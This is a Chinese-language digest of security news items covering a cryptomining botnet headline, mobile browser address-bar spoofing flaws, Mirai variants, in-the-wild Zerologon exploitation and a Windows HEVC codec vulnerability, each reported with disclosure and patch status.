“8220”挖矿木马入侵服务器挖矿，组建“海啸”僵尸网络，可发起DDoS攻击 https://mp.weixin.qq.com/s/X0LeyXch6Bsa_2aF-cItXQ  

作为老生常谈的话题，网络钓鱼依然是攻击者最热衷使用、且最行之有效的攻击方法之一。即使是久经考验的资深用户，在面对层出不穷的钓鱼手段有时候也可能会中招。近日，安全研究员拉斐·巴洛赫（Rafay Baloch）发现浏览器的反网络钓鱼功能（通常是网络钓鱼受害者最后一道防线）并不完美。 他在某些使用最广泛的移动浏览器（包括Apple的Safari，Opera和Yandex）中发现了多个漏洞，而利用这些漏洞，攻击者将能够诱骗浏览器显示与用户实际访问网站不同的网址。这些地址栏欺骗错误使攻击者更容易使其仿冒网站看起来像合法网站，从而为试图窃取密码的人创造了完美的条件。 这些漏洞主要是利用浏览器加载页面所需要的时间间隙期起作用的。一旦诱骗受害者打开网络钓鱼电子邮件或短信的链接，恶意网页就会使用该网页上隐藏的代码，将浏览器地址栏中的恶意网址有效替换为攻击者选择的任何其他网址。 在某些情况下，容易受到攻击的浏览器保留了绿色的挂锁图标，表示带有欺骗性网址的恶意网页是合法的。Rapid7 的研究主管 Tod Beardsley 帮助 Baloch 向每个浏览器制造商披露了漏洞，他说地址栏欺骗攻击使移动用户面临特别的风险。 他表示： 在移动设备上，屏幕所显示的空间绝对是溢价的，因此每英寸都是非常重要的，所以没有足够的空间来放置安全信号。在台式机浏览器上，您既可以查看自己所处的链接，也可以将鼠标悬停在链接上以查看要去的地方，甚至单击锁以获取证书详细信息。 这些额外的资源实际上并不存在于移动设备上，因此，位置栏不仅可以告诉用户他们正在访问哪个网站，而且还可以明确地并确定地告诉用户。如果您使用的是palpay.com而不是预期的paypal.com，则可能会注意到这一点，并在输入密码之前知道自己在虚假网站上。这样的欺骗性攻击使位置栏变得模棱两可，从而使攻击者能够对其假站点产生一定的信任度和信任度。 到目前为止，只有Apple和Yandex在9月和10月推出了修复程序。 Opera发言人Julia Szyndzielorz表示，其Opera Touch和Opera Mini浏览器的修复程序“正在逐步推出”。 但是UC浏览器，Bolt浏览器和RITS浏览器的制造商（总共安装了超过6亿个设备）没有对研究人员做出回应，并没有修补漏洞。     （消息来源：cnbeta，封面来自网络）

通过利用新一代防火墙作为外围传感器检测恶意有效负载和攻击方式，Unit42研究人员就能找出潜在的网络威胁。 Unit42研究人员从两个利用命令注入漏洞揭示IoT攻击模式的活动中发现了四个Mirai变体。 尽管这种通用方法允许研究人员观察整个伤害链，甚至可以获取恶意软件的二进制文件，但这种启发式方法确有其警报：流量指纹识别。 …     更多内容请至Seebug Paper 阅读全文：https://paper.seebug.org/1375/ 消息与封面来源：paloaltonetworks ，译者：小江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

安全研究人员本周五发布警告称，2020 年最严重的 Windows 漏洞之一目前正被黑客广泛利用，从而对网络中那些存储用户凭证和管理员账号的服务器植入后门。该漏洞名为“Zerologon”，能让攻击者访问活动目录，以管理员身份创建、删除和管理网络账号。 在黑客攻击中会掌控 Active directories 和域控制器，允许攻击者使用执行代码对所有连接到该网络的计算机发起攻击。微软在今年 8 月补丁星期二活动日发布的累积更新中，已经修复了这个编号为 CVE-2020-1472 的漏洞。 上周五，以独立研究员身份工作的凯文·博蒙特（Kevin Beaumont）在一篇博客文章中表示，已经有证据表明黑客利用该漏洞发起了攻击。他表示已经有黑客针对他的蜜罐（honeypot）进行了攻击，这个尚未修复的诱饵服务器中受到了攻击，攻击者便能够使用Powershell脚本成功更改管理员密码并对该服务器进行后门操作。 博蒙特表示这些攻击完全是脚本化的，所有命令在几秒钟内即可完成。这样，攻击者安装了后门，从而可以远程管理其模拟网络中的设备。攻击者（使用用户名sdb和密码jinglebell110 @设置了帐户）也启用了远程桌面。结果，如果后续修补CVE-2020-1472，攻击者将继续具有远程访问权限。     （消息来源：cnbeta，封面来自网络）

由于微软操作系统在处理 HEVC 文件方式上存在漏洞，那些使用 Windows 设备的 iPhone 用户在浏览和编辑视频文件的时候存在被黑客远程攻击的风险。该漏洞于上周被发现，存在于微软的 Windows Codecs Library 中，能接管未修复的设备并执行远程代码。美国网络安全和基础设施安全局已于上周五将威胁标记为“威胁”。 与大多数远程攻击媒介一样，用户通过打开特殊设计的有效负载（在本例中为 HEVC 图像文件）来触发任意代码执行。Windows 对编解码器的处理不当，触发了似乎是内存溢出的错误，从而导致系统被入侵并可能进行远程接管。 正如外媒 PC World 所指出的，iPhone 用户特别容易受到这个 Windows 漏洞的影响，尤其是当前手机版本严重依赖 HEVC 进行视频录制。自 iPhone 7以来，Apple就提供了该编解码器，并已成为iOS 11的标准高分辨率视频文件格式。 此外，长期使用 iPhone 的用户可能习惯于接收 HEVC 视频附件或在线查看文件格式，而从微软商城手动下载HEVC或“来自设备制造商的HEVC”编解码器的用户也容易受到攻击。 微软上周发布了该漏洞的补丁。 1.0.32762.0、1.0.32763.0和更高版本被认为可以安全使用，用户可以从公司的在线商店下载。     （稿源：cnbeta；封面来自网络）